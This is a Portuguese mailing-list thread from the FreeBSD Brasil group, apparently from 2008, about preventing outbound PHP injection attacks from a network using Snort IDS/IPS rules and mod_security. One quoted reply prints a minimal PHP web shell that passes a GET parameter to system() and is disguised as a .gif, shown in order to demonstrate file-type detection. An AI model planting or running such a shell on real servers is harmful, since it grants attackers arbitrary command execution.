[FUG-BR] OT-Ataque PHP injection

Patrick Tracanelli eksffa em freebsdbrasil.com.br
Sexta Fevereiro 22 12:08:15 BRT 2008 

Marcelo M. Fleury escreveu:
> Olá,
> 
> até onde eu entendi, o interesse da Cristina é em não ser uma provedora de
> códigos maliciosos, no caso PHP.

Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios 
internos façam ataque de injection em qualquer q seja o destino/alvo.

> 
> Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques
> a rede/host, e sim de que a rede ou host seja uma provedora de ataques...

E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2 
fluxos, o que sai e o que entra na/da rede. Ainda não entendi a 
relutancia hehe.

  na
> realidade não conheço solução voltada para isso... existe o mod_security

A solução é o IPS/IDs hehe ;)

O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela 
quer. O mod_security é o mais indicado pra proteger exclusivamente o 
Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto 
sequer, é capaz de identificar padrões iniciados da maquina com 
mod_security para outros destinos. Apenas quando o destino final é o 
Apache (serviço httpd).

do
> apache que pode te ajudar a monitorar e filtrar suas aplicações.
> 
> Penso em algum programa que cheque a integridade de arquivos no servidor,
> algo parecido com o file:
> 
> marcelo em mmf:~$ cat sh.gif
> <?php
>         system($_GET['sh']);
> ?>
> marcelo em mmf:~$ file sh.gif
> sh.gif: PHP script text
> 
> e depois, habilitar alguns filtros no mod_security buscando checar qualquer
> uso indevido do php... confesso que não conheço muito o mod_security, uma
> vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar
> um tempo para brincar com ele).
> 
> Acredito que no mais é realizar auditorias... procurar nos logs do apache
> por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não
> resolva!

Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser 
pro-ativa.

E pelo que entendi na situação da Cristina ela não terá logs do Apache 
ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes 
de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos).

> 
> Espero ter ajudado, boa sorte!
> 
> 
> Em 22/02/08, William Grzybowski <william88 em gmail.com> escreveu:
>> Oi Patrick,
>>
>> Não sei se entendi muito bem, poderia me dar uma luz?
>> Php injection, como próprio nome ja diz é a inserção de codigo php
>> causado por código mal escrito que permito o injeção de código php
>> externo no servidor, correto?
>>
>> Como que funcionam essas regras que você falou? Essas empresas liberam
>> regras que atuam (obviamente) na ""camada"" do HTTP e analizam o
>> trafego para os softwares vulneraveis que eles tem conhecimento e
>> inclusao direta de scripts em servidores externos?
>>
>> Vlw
>>
>> 2008/2/21 Patrick Tracanelli <eksffa em freebsdbrasil.com.br>:
>>
>>> Cristina Fernandes Silva escreveu:
>>>
>>>> É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
>>>  > ? ou somente as regras que posso usar no snort.
>>>
>>>  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
>>>  precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
>>>  não importa se é uma multinacional, pagara como pequeno. No site da
>>>  SourceFire tem todos os detalhes sobre preços.
>>>
>>>  São só as regras a principio, mas pode comprar o sistema deles. Não
>>>  conheço quem use no país o sistema deles. Mas não parece ser mais do
>> que
>>>  o Snort com um front-end muito amigável.
>>>
>>>  No caso da Juniper tem direito automaticamente a versão convertida pra
>>>  Snort todos que tem Juniper série 5000 e já pague a licença anual do
>> IPS
>>>  (que é um add-on no firewall Juniper).
>>>
>>>  No Brasil quem representa a venda das assinaturas Source Fire é a
>>>  BRConnection.
>>>
>>>
>>>
>>>  >
>>>  >
>>>  >
>>>  > Em 21/02/08, Patrick Tracanelli<eksffa em freebsdbrasil.com.br>
>> escreveu:
>>>  >> Cristina Fernandes Silva escreveu:
>>>  >>
>>>  >>> Acho que não fui clara, Vou explicar,
>>>  >>  >
>>>  >>  > Quero evitar que alguem da minha rede use o meu ip  (endereço )
>> para
>>>  >>  > fazer ataques
>>>  >>  > de php injection para outro endereço externo. Até mesmo os meus
>>>  >>  > usuarios interno fazer algum ataque para servidores externos..
>>>  >>
>>>  >>
>>>  >> Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível
>> de
>>>  >>  satisfação vai depender da qualidade das regras de análise de
>> instrusão
>>>  >>  que você utilizar. Isso quer dizer que dependendo do nível de
>> seriedade
>>>  >>  da empresa será proveitoso assinar um serviço (comercial) que
>> oferece
>>>  >>  regras testadas e atualizadas. Apesar da escolha natural ser Source
>>>  >>  Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas
>> pela
>>>  >>  Juniper. São as mesmas utilizadas no Juniper série 5000,
>> convertidas pro
>>>  >>  Snort.
>>>  >>
>>>  >> -------------------------
>>>  >>  Histórico: http://www.fug.com.br/historico/html/freebsd/
>>>  >>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>>  >>
>>>  > -------------------------
>>>  > Histórico: http://www.fug.com.br/historico/html/freebsd/
>>>  > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>>
>>>  -------------------------
>>>  Histórico: http://www.fug.com.br/historico/html/freebsd/
>>>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>>
>>
>>
>>
>> --
>>
>> William Grzybowski
>> ------------------------------------------
>> Jabber: william88 at gmail dot com
>> Curitiba/PR - Brazil
>> -------------------------
>>
>> Histórico: http://www.fug.com.br/historico/html/freebsd/
>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>
> 
> 
> 


-- 
Patrick Tracanelli

FreeBSD Brasil LTDA.
Tel.: (31) 3516-0800
316601 em sip.freebsdbrasil.com.br
http://www.freebsdbrasil.com.br
"Long live Hanin Elias, Kim Deal!"

Mais detalhes sobre a lista de discussão freebsd